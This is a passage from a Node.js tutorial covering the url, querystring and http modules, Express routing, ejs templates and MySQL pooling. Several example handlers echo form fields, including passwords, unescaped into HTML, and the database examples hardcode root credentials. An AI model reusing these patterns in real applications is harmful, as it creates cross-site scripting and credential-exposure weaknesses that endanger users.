• When set to true, a string of the form //foo/bar is interpreted as { host: 'foo', pathname: '/bar' }.
Components of a url string
var url=require('url');
var url1='http://calc.gongjuji.net/byte/?name=zhangsan&age=18#one#two';
console.log(url.parse(url1));
// { protocol: 'http:', //protocol in use
// slashes: null, //
// auth: null, //auth information
// host: 'calc.gongjuji.net', //full lowercased host portion of the URL, including the port if present
// port: null, //port
// hostname: 'calc.gongjuji.net',//lowercased host name
// hash: '#one#two', //fragment (anchor) portion
// search: '?name=zhangsan&age=18',//query portion, with the leading ?
// query: 'name=zhangsan&age=18', //query portion without the ?
// pathname: '/byte/', //path portion
// path: '/byte/?name=zhangsan&age=18',//path plus query
// href: 'http://calc.gongjuji.net/byte/?name=zhangsan&age=18#one#two' //the full URL as originally parsed; protocol and host are lowercased
// }
var url2='//www.gongjuji.net/byte/?name=zhangsan#one';
console.log(url.parse(url2,true,true));
// { protocol: null,
// slashes: true,
// auth: null,
// host: 'www.gongjuji.net',
// port: null,
// hostname: 'www.gongjuji.net',
// hash: '#one',
// search: '?name=zhangsan',
// query: { name: 'zhangsan' },
// pathname: '/byte/',
// path: '/byte/?name=zhangsan',
// href: '//www.gongjuji.net/byte/?name=zhangsan#one' }
var url=require('url');
var url2='//www.gongjuji.net/byte/?name=zhangsan#one';
console.log(url.parse(url2,true));
// { protocol: null,
// slashes: null,
// auth: null,
// host: null,
// port: null,
// hostname: null,
// hash: '#one',
// search: '?name=zhangsan',
// query: { name: 'zhangsan' },
// pathname: '//www.gongjuji.net/byte/',
// path: '//www.gongjuji.net/byte/?name=zhangsan',
// href: '//www.gongjuji.net/byte/?name=zhangsan#one' }
url.format(urlObj)
Formats a URL object back into a string.
var url=require('url');
var obj1={ protocol: 'http:',
slashes: true,
auth: null,
host: 'calc.gongjuji.net',
port: null,
hostname: 'calc.gongjuji.net',
hash: '#one#two',
search: '?name=zhangsan&age=18',
query: 'name=zhangsan&age=18',
pathname: '/byte/',
path: '/byte/?name=zhangsan&age=18',
href: 'http://calc.gongjuji.net/byte/?name=zhangsan&age=18#one#two'
};
var url1=url.format(obj1);
console.log(url1);
//http://calc.gongjuji.net/byte/?name=zhangsan&age=18#one#two
var url=require('url');
//the query field is given as a json object
var obj2={ protocol: 'http:',
slashes: true,
auth: null,
host: 'calc.gongjuji.net',
port: null,
hostname: 'calc.gongjuji.net',
hash: '#one#two',
search: '?name=zhangsan&age=18',
// query: { name: 'zhangsan', age: '18' }, //query portion, already parsed into an object
pathname: '/byte/',
path: '/byte/?name=zhangsan&age=18',
href: 'http://calc.gongjuji.net/byte/?name=zhangsan&age=18#one#two' };
var url2=url.format(obj2);
console.log(url2);
//http://calc.gongjuji.net/byte/?name=zhangsan&age=18#one#two
var url=require('url');
//the case with fields missing
var obj3={ protocol: null,
slashes: true,
auth: null,
host: 'www.gongjuji.net',
port: null,
hostname: 'www.gongjuji.net',
hash: '#one',
search: '?name=zhangsan',
query: { name: 'zhangsan' },
pathname: '/byte/',
path: '/byte/?name=zhangsan',
href: '//www.gongjuji.net/byte/?name=zhangsan#one' };
var url3=url.format(obj3);
console.log(url3);
//www.gongjuji.net/byte/?name=zhangsan#one
url.resolve(from, to)
Resolves a target URL relative to a base URL, the way a browser resolves an href.
from: the base URL;
to: the URL to resolve against it.
var url=require('url');
//a relative path
var url1=url.resolve('http://www.gongjuji.net/one/two/three','four');
console.log(url1); //http://www.gongjuji.net/one/two/four
//a path relative to the root
var url3=url.resolve('http://www.gongjuji.net/one/two/three','/four');
console.log(url3); //http://www.gongjuji.net/four
//a relative path against a base with a query
var url2=url.resolve('http://www.gongjuji.net/one/two/three?name=zhangsan','four');
console.log(url2); //http://www.gongjuji.net/one/two/four
//a base path with non-standard separators
var url4=url.resolve('http://www.gongjuji.net\\one#name1','/four');
console.log(url4);//http://www.gongjuji.net/four
//a relative path with non-standard separators
var url5=url.resolve('http://www.gongjuji.net/one','\\two\\three');
console.log(url5);//http://www.gongjuji.net/two/three
The querystring module
The querystring module provides utility functions for parsing and formatting URL query strings.
The querystring module has four methods:
querystring module method Description
querystring.escape(str) Escapes a string into its encoded form
querystring.unescape(str) Decodes an encoded string back into characters
querystring.stringify(obj[, sep[, eq[, options]]]) Serializes an object into a query string, with & and = as the pair separator and assignment character. obj: the object to serialize into a URL query string. sep: the substring delimiting key-value pairs in the query string, defaults to &. eq: the substring delimiting keys from values, defaults to =. options: encodeURIComponent <Function>, the function used to encode characters when converting the object into a query string, defaults to querystring.escape().
querystring.parse(str[, sep[, eq[, options]]]) Deserializes a query string into an object — the inverse of querystring.stringify
Chap4-17.js
var queryString=require("querystring");
var str=queryString.escape("哈哈");
console.log(str); //%E5%93%88%E5%93%88
console.log(queryString.unescape(str)); //哈哈
console.log(queryString.stringify({ foo: 'bar', baz: ['qux', 'quux'], corge: '' }));
// returns 'foo=bar&baz=qux&baz=quux&corge='
console.log(queryString.stringify({ foo: 'bar', baz: 'qux' }, ';', ':'));
// returns 'foo:bar;baz:qux'
console.log(queryString.parse('name=pkcms&author=zh&date='));
//{ name: 'pkcms', author: 'zh', date: '' }
console.log(queryString.parse('name=pkcms&author=zh&author=hhy&date='));
//repeated parameter names deserialize into an array: { name: 'pkcms', author: [ 'zh', 'hhy' ], date: '' }
console.log(queryString.parse('name=pkcms,author=zh,date=',','));
//the 2nd argument gives the pair separator character: { name: 'pkcms', author: 'zh', date: '' }
console.log(queryString.parse('name:pkcms,author:zh,date:',',',':'));
//the 3rd argument gives the assignment character: { name: 'pkcms', author: 'zh', date: '' }
HTTP server and client
The Node.js standard library provides the http module, which wraps an efficient HTTP server and a simple HTTP client. http.Server is an event-based HTTP server, and http.request is an HTTP client tool for making requests to HTTP servers.
HTTP server
http.Server is the HTTP server object in the http module. Everything built on HTTP with Node.js — websites, social applications, even proxy servers — is based on http.Server.
http.Server is an event-based HTTP server: every request is wrapped as an independent event, and to implement the full functionality of an HTTP server a developer only needs to write handlers for its events. It inherits from EventEmitter and provides the following events:
• request: fired when a client request arrives, with two arguments, req and res — instances of http.ServerRequest and http.ServerResponse, representing the request and response information.
• connection: fired when a TCP connection is established, with one argument, socket, an instance of net.Socket. connection is coarser-grained than request, because a client in keep-alive mode may send several requests over the same connection.
• close: fired when the server shuts down — note: not when a user's connection drops.
Of these events, request is by far the most used, so http provides a shortcut: http.createServer([requestListener]), which creates an HTTP server and registers requestListener as the listener for the request event.
Chap4-2.js
var http=require('http')
http.createServer(function (req,res) {
res.writeHead(200,{"Content-Type":"text/html"});
res.write("<h1>Node.js</h1>");
res.end("<p style='font-size: x-large'>Hello World</p>");
}).listen(3000);
Chap4-15.js
var http=require("http");
var server=new http.Server();
var count=0;
server.on("connection",function () {
console.log("someone connected!")
});
server.on("request",function (req,res) {
res.writeHead(200,{"Content-Type":"text/html"});
res.write("<h1>Node.js</h1>");
res.end("<p style='font-size: x-large'>Hello World</p>");
});
server.on("close",function () {
console.log("server closed!")
});
server.listen(3000);
setTimeout(function () {
server.close();
},5000);
console.log("HTTP server is listening at port 3000.");
http.ServerRequest
http.ServerRequest carries the information of an HTTP request — the part back-end developers care about most. It is normally delivered by http.Server's request event as the first argument, usually abbreviated request or req.
An HTTP request can be split into two parts: the request header and the request body.
ServerRequest property Description
complete Whether the client request has finished being sent
httpVersion HTTP protocol version, usually 1.0 or 1.1
method HTTP request method, e.g. GET, POST, PUT, DELETE
url The raw request path, e.g. /static/image/x.jpg or /user?name=byvoid
headers The HTTP request headers
trailers The HTTP request trailers (uncommon)
connection The current HTTP connection socket, an instance of net.Socket
socket Alias of the connection property
client Alias of the connection property
http.ServerRequest provides the following 3 events for controlling request body transfer:
• data: fired when a chunk of request body data arrives, with one argument, chunk, the received data. If this event has no listener, the request body is discarded. The event may fire multiple times.
• end: fired when the request body has been fully transferred; no more data will arrive afterwards.
• close: fired when the user's current request ends. Unlike end, it is still fired even if the user forcibly terminated the transfer.
Getting the content of a GET request
Because a GET request's parameters are embedded directly in the path, and the URL is the full request path including everything after the ?, you can parse that trailing part yourself to obtain the GET parameters. The parse function in Node.js's url module provides exactly this.
var http=require("http");
var url=require("url");
http.createServer(function (req,res) {
console.log(url.parse(req.url));
}).listen(3000);
http://localhost:3000/chap4-16?name=zhangsan&password=123456
Url {
protocol: null,
slashes: null,
auth: null,
host: null,
port: null,
hostname: null,
hash: null,
search: '?name=zhangsan&password=123456',
query: 'name=zhangsan&password=123456',
pathname: '/chap4-16',
path: '/chap4-16?name=zhangsan&password=123456',
href: '/chap4-16?name=zhangsan&password=123456' }
Chap4-16.html
<form action="http://localhost:3000/myNode/chap4/chap4-16.js" method="get">
<span>Username:</span><input type="text" name="user">
<span>Password:</span><input type="password" name="password">
<input type="submit" value="Submit">
</form>
Chap4-16.js
var http=require("http");
var url=require("url");
var queryString=require("querystring");
http.createServer(function (req,res) {
//replaceable part begins
var query=url.parse(req.url).query;
console.log(query);
var params=queryString.parse(query);
res.writeHead(200,{"Content-Type":"text/html;charset=utf-8"});
res.write("Username: "+params.user);
res.end("Password: "+params.password);
//replaceable part ends
}).listen(3000);
console.log("HTTP server is listening at port 3000.");
Replaceable part:
var query=url.parse(req.url,true).query;
res.writeHead(200,{"Content-Type":"text/html;charset=utf-8"});
res.write("Username: "+query.user);
res.end("Password: "+query.password);
Getting the content of a POST request
The content of a POST request lives entirely in the request body.
http.ServerRequest has no property holding the request body, because waiting for the body to transfer can be time-consuming — uploading a file, say. So Node.js does not parse request bodies by default; when you need one, you do it by hand.
http.ServerResponse
http.ServerResponse is the information returned to the client, and it determines what the user ultimately sees. It is passed as the second argument, usually abbreviated response or res.
http.ServerResponse has three important member functions, for returning the response headers, the response content, and ending the request.
• response.writeHead(statusCode, [headers]): sends response headers to the requesting client. statusCode is the HTTP status code, such as 200 (OK) or 404 (Not Found). headers is an associative-array-like object whose properties are the response headers. This function can be called at most once per request; if it is never called, a response header is generated automatically.
• response.write(data, [encoding]): sends response content to the requesting client. data is a Buffer or a string holding the content to send. If data is a string, encoding gives its encoding, defaulting to utf-8. response.write may be called multiple times before response.end.
• response.end([data], [encoding]): ends the response, telling the client that everything has been sent. This function must be called exactly once when all content to return has been sent. Its two optional arguments mean the same as those of response.write. If it is never called, the client will wait forever.
Chap4-18.html
<form action="http://localhost:3000/myNode/chap4/chap4-18.js" method="post">
<span>Username:</span><input type="text" name="user">
<span>Password:</span><input type="password" name="password">
<input type="submit" value="Submit">
</form>
Chap4-18.js
var http=require("http");
var querystring=require("querystring");
var util=require("util");
http.createServer(function (req,res) {
var post="";
req.on("data",function (chunk) {
post+=chunk;
});
req.on("end",function () {
post=querystring.parse(post);
res.writeHead(200,{"Content-Type":"text/html;charset=utf-8"});
res.write("Username: "+post.user);
res.end("Password: "+post.password);
});
}).listen(3000);
console.log("HTTP server is listening at port 3000.");
HTTP client
The http module provides two functions, http.request and http.get, for making requests to an HTTP server as a client.
http.request(options, callback) initiates an HTTP request and returns an instance of http.ClientRequest. It takes two arguments: options, an associative-array-like object with the request's parameters, and callback, the request's callback function. Common options are:
• host: the domain name or IP address of the site to request.
• port: the port of the site to request, default 80.
• method: the request method, default GET.
• path: the request path relative to the root, default /. The query string should be included here, e.g. /search?query=byvoid.
• headers: an associative-array object holding the request headers.
http.get(options, callback): the http module also offers a simpler helper for GET requests, http.get. It is a simplified http.request; the only differences are that http.get automatically sets the request method to GET and that you do not need to call req.end() by hand.
Chap4-19.js
var http=require('http');
http.createServer(function (req,res) {
res.writeHead(200,{"Content-Type":"text/html;charset=utf-8"});
//GET request to an external site
var html='';
http.get('http://www.njfu.edu.cn',function(res1){ //the callback receives the response
res1.on('data',function(data){
html+=data;
});
res1.on('end',function(){
res.end(html);
});
});
}).listen(3000);
console.log("HTTP server is listening at port 3000.");
Chap4-20.js
var http=require('http');
var querystring=require('querystring');
http.createServer(function (req,res) {
res.writeHead(200,{"Content-Type":"text/html;charset=utf-8"});
//send an HTTP POST request
var postData=querystring.stringify({
msg:'中文内容'
});
var options={
hostname:'www.njfu.edu.cn',
port:80,
path:'/',
method:'POST',
headers:{
'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',
'Content-Length':Buffer.byteLength(postData)
}
};
var html='';
var req1=http.request(options, function(res1) {
res1.setEncoding('utf-8');
res1.on('data',function(chun){
html+=chun;
});
res1.on('end',function(){
res.end(html);
});
});
req1.write(postData); // write data to request body
req1.end();
}).listen(3000);
console.log("HTTP server is listening at port 3000.");
The Express framework
• Express framework overview
• Routing
• Template engines
• Database integration
Express framework overview
Express is a minimal and flexible Node.js web application framework that provides a powerful set of features for building all kinds of web applications, along with rich HTTP utilities. We use Express as our development framework because it is currently the most stable and most widely used web framework, and the only one officially recommended by Node.js.
With Express you can quickly stand up a fully functional website. Core features of the Express framework:
• Middleware can be set up to respond to HTTP requests.
• A routing table is defined for performing different actions on different HTTP requests.
• HTML pages can be rendered dynamically by passing parameters to templates.
Setup
1. Install Express:
npm install express -g //global install
npm install express-generator -g //install the application generator globally
2. Initialize the project:
cd example //enter the project folder
express project //create the express app; project is the directory name
3. Run the following commands:
cd project //enter the project root
npm install //install dependencies
Final layout:
express directory structure
• /bin: used to start the application (server)
• node_modules: holds the modules installed from package.json; when you add a dependency to package.json and install it, it lands here
• /public: static assets (images, css, js)
• /routes: routes determine how the application responds to client requests at particular endpoints, each consisting of a URI (path) and an HTTP request method (GET, POST, etc.). Each route can have one or more handler functions, executed when the route matches.
• /views: the directory of template files
• app.js: the main file, the entry point that starts the server
• package.json: stores project information and module dependencies; after adding dependent modules under dependencies, run npm install
app.js (excerpt)
var createError = require('http-errors');
var express = require('express');
var path = require('path');
var cookieParser = require('cookie-parser');
var logger = require('morgan');
// route information (endpoints), kept under the routes directory
var indexRouter = require('./routes/index');
var usersRouter = require('./routes/users');
var app = express();
// template setup
app.set('views', path.join(__dirname, 'views'));
app.engine('.html', require('ejs').__express);
app.set('view engine', 'html');
//略
//wire up the routes: ('custom path', endpoint defined above)
app.use('/', indexRouter);
app.use('/users', usersRouter);
Install the ejs module: npm install ejs
index.js
var express = require('express');
var router = express.Router();
/* GET home page. */
router.get('/', function(req, res, next) {
res.type("text/html");
res.render("home",{pic:"images/njfu.jpg"}); //important
});
module.exports = router;
users.js
var express = require('express');
var router = express.Router();
/* GET users listing. */
router.get('/', function(req, res, next) {
res.type("text/html");
res.send('<h1>Welcome to Nanjing Forestry University</h1>');
});
module.exports = router;
home.html
<body class="HolyGrail">
<header>
<img src=<%=pic%> width="100%" height="200">
<!-- the <%= pic %> tag displays the referenced variable, i.e. a property of the object passed as the second argument to res.render. -->
</header>
<div class="HolyGrail-body">
<div class="HolyGrail-nav">
<ul>
…
</ul>
</div>
<div class="HolyGrail-content">
<h1 style="text-indent: 20px">NJFU News</h1>
<ul>
…
</ul>
</div>
</div>
<footer>
<h5>Copyright © 2003-2012 Nanjing Forestry University. All rights reserved. Address: 159 Longpan Road, Nanjing</h5>
</footer>
</body>
Start the server: npm start
After it starts, the terminal prints node ./bin/www
Visit http://localhost:3000/ and http://localhost:3000/users in a browser
Architecture of an Express site
The browser issues a request, which the router receives and directs to a controller according to the path. The controller handles the user's specific request, possibly accessing objects in the database, i.e. the model. The controller also calls the template engine to generate the view's HTML, which the controller finally returns to the browser, completing the request.
Architecture of an Express site
Routing
Routing defines an application's endpoints (URIs) and how the application responds to client requests.
A route consists of a URI, an HTTP request method (GET, POST, etc.), and one or more handlers; its structure is:
router.METHOD(path, [callback...], callback)
• router is an instance of express.Router; a Router instance is a complete middleware and routing system.
• METHOD is an HTTP request method, such as GET or POST.
• path is a path on the server.
• callback is the function executed when the route matches.
// GET method route
router.get('/', function (req, res) {
res.send('GET request to the homepage');
});
// POST method route
router.post('/', function (req, res) {
res.send('POST request to the homepage');
});
Route paths
Route paths, together with the request method, define the endpoints of requests; they can be strings, string patterns, or regular expressions.
// match requests to the root path
router.get('/', function (req, res) {
res.send('root');
});
// match requests to the /about path
router.get('/about', function (req, res) {
res.send('about');
});
// match requests to the /random.text path
router.get('/random.text', function (req, res) {
res.send('random.text');
});
// match acd and abcd
router.get('/ab?cd', function(req, res) {
res.send('ab?cd');
});
// match abcd, abbcd, abbbcd, etc.
router.get('/ab+cd', function(req, res) {
res.send('ab+cd');
});
// match abcd, abxcd, abRANDOMcd, ab123cd, etc.
router.get('/ab*cd', function(req, res) {
res.send('ab*cd');
});
// match /abe and /abcde
router.get('/ab(cd)?e', function(req, res) {
res.send('ab(cd)?e');
});
Route handlers
You can provide multiple callback functions to handle a request; they behave like middleware. The one difference is that these callbacks may call next('route') to skip the remaining callbacks of the route. This mechanism lets you impose preconditions on a route and hand control to subsequent routes when continuing on the current path makes no sense.
Route handlers come in several forms: a single function, an array of functions, or a mixture of the two.
app.js (excerpt)
// route information (endpoints), kept under the routes directory
var chap422Router = require('./routes/chap4-22');
//wire up the route: ('custom path', endpoint defined above)
app.use("/chap4-22",chap422Router);
chap4-22.js
var express = require('express');
var router = express.Router();
router.get('/a', function (req, res) {
res.type("text/html");
res.send('<h1>Hello from A!</h1>');
});
router.get('/b', function (req, res, next) {
console.log('response will be sent by the next function ...');
next();
}, function (req, res) {
res.type("text/html");
res.send('<h1>Hello from B!</h1>');
});
var cb0 = function (req, res, next) {
console.log('CB0');
next();
};
var cb1 = function (req, res, next) {
console.log('CB1');
next();
};
var cb2 = function (req, res) {
res.type("text/html");
res.send('<h1>Hello from C!</h1>');
};
router.get('/c', [cb0, cb1, cb2]);
router.get('/d', [cb0, cb1], function (req, res, next) {
console.log('response will be sent by the next function ...');
next();
}, function (req, res) {
res.type("text/html");
res.send('<h1>Hello from D!</h1>');
});
module.exports = router;
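next('route') itself does not appear in the example above; the sketch below shows how it can guard a route. The paths and the id check here are made up for illustration, and the snippet assumes it lives in a router file wired up like the others:

```
var express = require('express');
var router = express.Router();

// first matching route: its guard may skip this route's remaining callbacks
router.get('/user/:id', function (req, res, next) {
  if (req.params.id === '0') return next('route'); // fall through to the next route
  next(); // otherwise continue with this route's second callback
}, function (req, res) {
  res.send('regular user: ' + req.params.id);
});

// runs only when the route above called next('route')
router.get('/user/:id', function (req, res) {
  res.send('special user');
});

module.exports = router;
```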
Response methods
Methods on the response object (res) send a response to the client and terminate the request-response cycle. If a route handler calls none of them, the client request is left hanging.
res.download(path [, filename] [, callback]) transfers the file as an attachment (internally via res.sendFile()).
• path: the (absolute) path of the file to transfer; the browser will normally pop up a file-download dialog.
• filename: the default file name shown in the download dialog.
app.js (excerpt)
app.get("/download",function (req, res) {
var q = req.query;
if (q.type == "jpg") {
res.download(__dirname + "/public/images/njfu.jpg", "NJFU.jpg");
} else if (q.type == "txt") {
res.download(__dirname + "/public/files/content.txt");
} else {
res.send("Bad request");
}
});
res.end([data] [, encoding]) ends the response-handling process.
res.json([body]) sends a JSON response. It has the same effect as passing an object or an array to res.send().
res.redirect([status,] path) sends a redirect.
• status: {Number}, the HTTP status code to set; if none is given, the default 302 "Found" is used.
• path: {String}, the URL to set in the Location header.
res.send([body]) sends a response of various types.
res.render(view [, option] [, callback(err,html)]) renders the view template and sends the rendered HTML string to the client.
• view: the template file name, looked up under the views folder by default;
• option: an object specifying the data to pass in;
• callback(err,html): a callback in which err carries any error and html the rendered HTML string. Note: if a callback is given, the server does not send the HTML string to the client automatically; send it yourself with res.send().
app.js (excerpt)
// route information (endpoints), kept under the routes directory
var chap423Router = require('./routes/chap4-23');
//wire up the route: ('custom path', endpoint defined above)
app.use("/chap4-23",chap423Router);
chap4-23.js
var express = require('express');
var url = require('url');
var router = express.Router();
router.get('/redirect', function (req, res) {
res.redirect("/chap4-22/a");
});
router.get('/end', function (req, res) {
res.type("text/html");
res.end("<h1>End of response processing</h1>");
});
router.get('/json', function (req, res) {
res.json({user:"Zhangsan",password:"123456"});
});
router.get('/render', function (req, res) {
var newpath=url.resolve(req.url,"/images/njfu.jpg");
res.render("home",{pic:newpath},function (err,html) {
if(err){
console.error(err);
}else{
res.send(html);
}
});
});
module.exports = router;
Request methods
request is the browser's request to the server. Two methods are generally used, post and get, and both specify a route. request provides three ways to obtain parameters and content: request.params, request.query, and request.body.
• request.body returns content sent via POST (name-value pairs);
app.js (excerpt)
// route information (endpoints), kept under the routes directory
var chap426Router = require('./routes/chap4-26');
//ejs templates
app.set('views', path.join(__dirname, 'views'));
app.set('view engine', 'ejs');
//wire up the route: ('custom path', endpoint defined above)
app.use("/chap4-26",chap426Router);
chap4-26.js
var express = require('express');
var router = express.Router();
router.get('/', function(req, res, next) {
res.render('chap4-26');
});
router.post('/add', function (req, res) {
res.type("text/html");
res.write('<h1>Name: '+req.body.name+'</h1>');
res.write('<h1>Age: '+req.body.age+'</h1>');
res.end('<h1>Occupation: '+req.body.professional+'</h1>');
});
module.exports = router;
chap4-26.ejs
<div>
<form action="/chap4-26/add" method="post">
姓名:<input type="text" name="name">
年龄:<input type="text" name="age">
职业:<input type="text" name="professional">
<input type="submit" value="post提交">
</form>
</div>
• request.query returns the content sent by a GET request, i.e. the name/value pairs after the ? in the URL;
chap4-26.ejs
<div>
<form action="/chap4-26/add1" method="get">
姓名:<input type="text" name="name1">
年龄:<input type="text" name="age1">
职业:<input type="text" name="professional1">
<input type="submit" value="get提交">
</form>
</div>
chap4-26.js
router.get('/add1', function (req, res) {
res.type("text/html");
res.write('<h1>姓名:'+req.query.name1+'</h1>');
res.write('<h1>年龄:'+req.query.age1+'</h1>');
res.end('<h1>职业:'+req.query.professional1+'</h1>');
});
• request.params returns the parameters captured by the Express router.
chap4-26.ejs
<div>
<a href="/chap4-26/Update/zhangsan">修改</a>
</div>
chap4-26.js
router.get('/Update/:name', function (req, res) {
res.type("text/html");
res.send('<h1>姓名:'+req.params.name+'</h1>');
});
Template Engines
A template engine is a tool that generates HTML from a page template according to a set of rules. In an MVC architecture the template engine sits on the server side: after the controller receives a user request, it fetches data from the model and invokes the template engine. The engine takes the data and the page template as input, produces an HTML page, and hands it back to the controller, which returns it to the client.
There are many JavaScript template engines; we recommend ejs (Embedded JavaScript) because it is very simple and integrates well with Express. Since it is implemented in standard JavaScript, it runs not only on the server but also in the browser.
The template engine and the location of the page templates are configured in app.js with the following two statements:
app.js (excerpt)
app.set('views', path.join(__dirname, 'views'));
app.set('view engine', 'ejs');
ejs's tag system is very simple; it has only the following three tags.
• <% code %>: executes JavaScript code.
• <%= code %>: outputs the value with HTML special characters escaped.
• <%- code %>: outputs raw, unescaped HTML.
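The difference between <%= and <%- comes down to HTML escaping. A minimal sketch of that escaping rule in plain Node.js (this mimics what ejs does internally; it is an illustration, not ejs's actual implementation):

```javascript
// Escapes the HTML special characters that <%= %> replaces and <%- %> leaves alone.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')   // must run first, or the other entities get double-escaped
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;');
}

const value = '<b>Express</b>';
console.log(escapeHtml(value)); // what <%= value %> would render
console.log(value);             // what <%- value %> would render
```

So <%= %> is the safe default for user-supplied data, while <%- %> is for markup you generated yourself.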
chap4-24.ejs
<h1><%=title%></h1>
<p>Welcome to <%=title%></p>
chap4-24.js
var express = require('express');
var router = express.Router();
router.use("/",function (req, res, next) {
res.render("chap4-24",{title:"Express"});
});
module.exports = router;
app.js (excerpt)
// route module (endpoint definitions), stored under the routes directory
var chap425Router = require('./routes/chap4-25');
// template engine setup
app.set('views', path.join(__dirname, 'views'));
app.set('view engine', 'ejs');
// mount the router: ('custom path', the router loaded above)
app.use("/chap4-25",chap425Router);
chap4-25.ejs
<!doctype html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>EJS模板</title>
<link rel="stylesheet" href="/stylesheets/chap4-25.css"/>
</head>
<body>
<h1>EJS模板引擎</h1>
<p>这是很简单的一个小流程就不在一一的标注流程了,注释的很清楚了</p>
<p>这里是姓名: <span><%= name %></span></p>
<p>这里是性别: <span><%= sex %></span></p>
<p>这里是性别: <span><%= content %></span></p>
</body>
</html>
chap4-25.css
h1{ text-align: center;}
p{ font-size:20px;}
span{ font-size:25px; color: red;}
chap4-25.js
var express = require('express');
var router = express.Router();
var data={
name : 'webarn',
sex : '男',
content : '参数,可以更改'
};
router.use("/",function (req, res, next) {
res.render("chap4-25",data);
});
module.exports = router;
Integrating a Database
To give an Express application the ability to connect to a database, simply install the Node.js driver for that database.
MySQL module: npm install mysql
Preparing the MySQL environment
Parameters configured when installing MySQL:
• server name: localhost (default)
• user name: root
• password: 0923
After installation, open MySQL Workbench, connect to the server (localhost), create a new database on it (for example, educationdb), create a table in that database with a CREATE TABLE statement (for example, person), and add some data.
-- ----------------------------
-- Table structure for person
-- ----------------------------
CREATE TABLE `person` (
`id` int(11) NOT NULL AUTO_INCREMENT PRIMARY KEY,
`name` varchar(255) DEFAULT NULL,
`age` int(11) DEFAULT NULL,
`professional` varchar(255) DEFAULT NULL
)
-- ----------------------------
-- Records of person
-- ----------------------------
INSERT INTO `person` VALUES ('1', '武大', '25', '计算机科学与技术');
INSERT INTO `person` VALUES ('2', '王二', '25', '计算机科学与技术');
INSERT INTO `person` VALUES ('3', '张三', '25', '计算机科学与技术');
INSERT INTO `person` VALUES ('4', '李四', '25', '计算机科学与技术');
INSERT INTO `person` VALUES ('5', '孙五', '25', '计算机科学与技术');
INSERT INTO `person` VALUES ('6', '钱六', '25', '计算机科学与技术');
INSERT INTO `person` VALUES ('7', '赵七', '25', '计算机科学与技术');
INSERT INTO `person` VALUES ('8', '刘八', '25', '计算机科学与技术');
INSERT INTO `person` VALUES ('9', '张九', '25', '计算机科学与技术');
INSERT INTO `person` VALUES ('10', '郑十', '25', '计算机科学与技术');
Connecting
The mysql module is a Node.js JavaScript client that implements the MySQL protocol; through it you can open connections to a MySQL database, execute queries, and so on.
To establish a connection, create a connection object with createConnection(), then open it with connect().
var mysql = require('mysql');
var connection = mysql.createConnection({
host: 'localhost',
user: 'root',
password: '0923',
database: 'educationdb'
});
// replaceable section begins
connection.connect(function(err) {
if (err) {
return console.error('连接错误: ' + err.stack);
}
console.log('连接ID ' + connection.threadId);
});
// replaceable section ends
A connection can also be created implicitly by the first query:
Replaceable section:
connection.query('SELECT * from person', function(err, rows) {
// if there is no error, the connection succeeded
});
When creating a connection you can pass in options. The available options are:
• host — host name to connect to (default: localhost)
• port — port number to connect to (default: 3306)
• user — MySQL user name
• password — MySQL password
• database — the database to connect to
• connectTimeout — connection timeout (default: 10000 ms)
There are two ways to close a database connection.
• end() closes the connection after any pending queries have finished:
connection.end(function(err) {
// The connection is terminated now
});
• destroy() closes the underlying socket immediately; it takes no callback:
connection.destroy();
Connection Pooling
A database connection is a limited resource that noticeably affects the scalability and robustness of the whole application, which is especially evident in multi-user web applications.
A connection pool addresses exactly this problem. It allocates, manages, and releases database connections: it lets the application reuse an existing connection instead of opening a new one, and it closes connections that have been idle longer than the maximum allowed idle time, avoiding leaks caused by connections that are never released.
A connection pool can markedly improve the performance of database operations.
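The reuse-instead-of-reopen idea can be sketched independently of MySQL. The following toy pool is illustrative only (the real pooling for this chapter is done by mysql's createPool()):

```javascript
// Minimal illustrative pool: hands out an idle "connection" when one
// exists, and only creates a new one when none are free.
class TinyPool {
  constructor(factory) {
    this.factory = factory; // creates a new connection object
    this.idle = [];         // connections waiting to be reused
    this.created = 0;       // how many real connections were ever opened
  }
  acquire() {
    if (this.idle.length > 0) return this.idle.pop(); // reuse an existing one
    this.created += 1;
    return this.factory(this.created);
  }
  release(conn) {
    this.idle.push(conn); // returned to the pool, not closed
  }
}

const pool = new TinyPool(id => ({ id }));
const a = pool.acquire(); // opens connection 1
pool.release(a);
const b = pool.acquire(); // reuses connection 1 instead of opening a second
console.log(pool.created, b.id); // 1 1
```

Two acquires with a release in between still cost only one real connection — that saving is the whole point of pooling.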
A pool connection is obtained through the createPool() method.
When you are finished with the pool, use end() to close all of the connections in it:
pool.end(function (err) {
// all connections in the pool have ended
});
Through getConnection() you can share a single connection or manage multiple connections.
When you are done with a connection, call connection.release() to return it to the pool so that it can be reused by others.
connection.release() does not remove the connection from the pool; if you need to close a connection and remove it from the pool, use connection.destroy().
db.js
// database module
var mysql = require('mysql');
var pool = mysql.createPool({
host: 'localhost',
user: 'root',
password: '0923',
database: 'educationdb'
});
function query(sql, callback) {
pool.getConnection(function (err, connection) {
if (err) { return callback(err); } // guard: connection is undefined if the pool errors
// Use the connection
connection.query(sql, function (err, rows) {
callback(err, rows);
connection.release(); // release the connection back to the pool
});
});
}
exports.query = query;
Executing SQL Statements
All database operations are carried out through SQL statements; with SQL you can create databases and tables, and insert/delete/update/query the data in a table.
Running a query: in node-mysql, SQL statements are executed with the query() method of a connection or pool instance; the statement can be a SELECT query or any other database operation. query() has the following three forms:
• connection.query(sqlString, function(err, results, fields))
• sqlString: the SQL statement to execute;
• results: the query results;
• fields: information about the result fields.
connection.query('SELECT * FROM `books` WHERE `author` = "David"', function (error, results, fields){});
• connection.query(sqlString, values, function(err, results, fields))
• values: an array of values to substitute for the placeholders in the query:
connection.query('SELECT * FROM `books` WHERE `author` = ?', ['David'], function (error, results, fields){});
var post = {id: 1, title: 'Hello MySQL'};
var query = connection.query('INSERT INTO posts SET ?', post, function(err, result) {
//...
});
console.log(query.sql); // INSERT INTO posts SET `id` = 1, `title` = 'Hello MySQL'
// identifiers can likewise use the ?? identifier placeholder
var userId = 1;
var columns = ['username', 'email'];
var query = connection.query('SELECT ?? FROM ?? WHERE id = ?', [columns, 'users', userId], function(err, results) {
// ...
});
console.log(query.sql); // SELECT `username`, `email` FROM `users` WHERE id = 1
• connection.query(options, function(err, results, fields))
• options: an object of query option parameters
connection.query({
sql: 'SELECT * FROM `books` WHERE `author` = ?',
values: ['David']
}, function (error, results, fields) {});
• When parameter placeholders are used, the second and third forms can also be combined, for example:
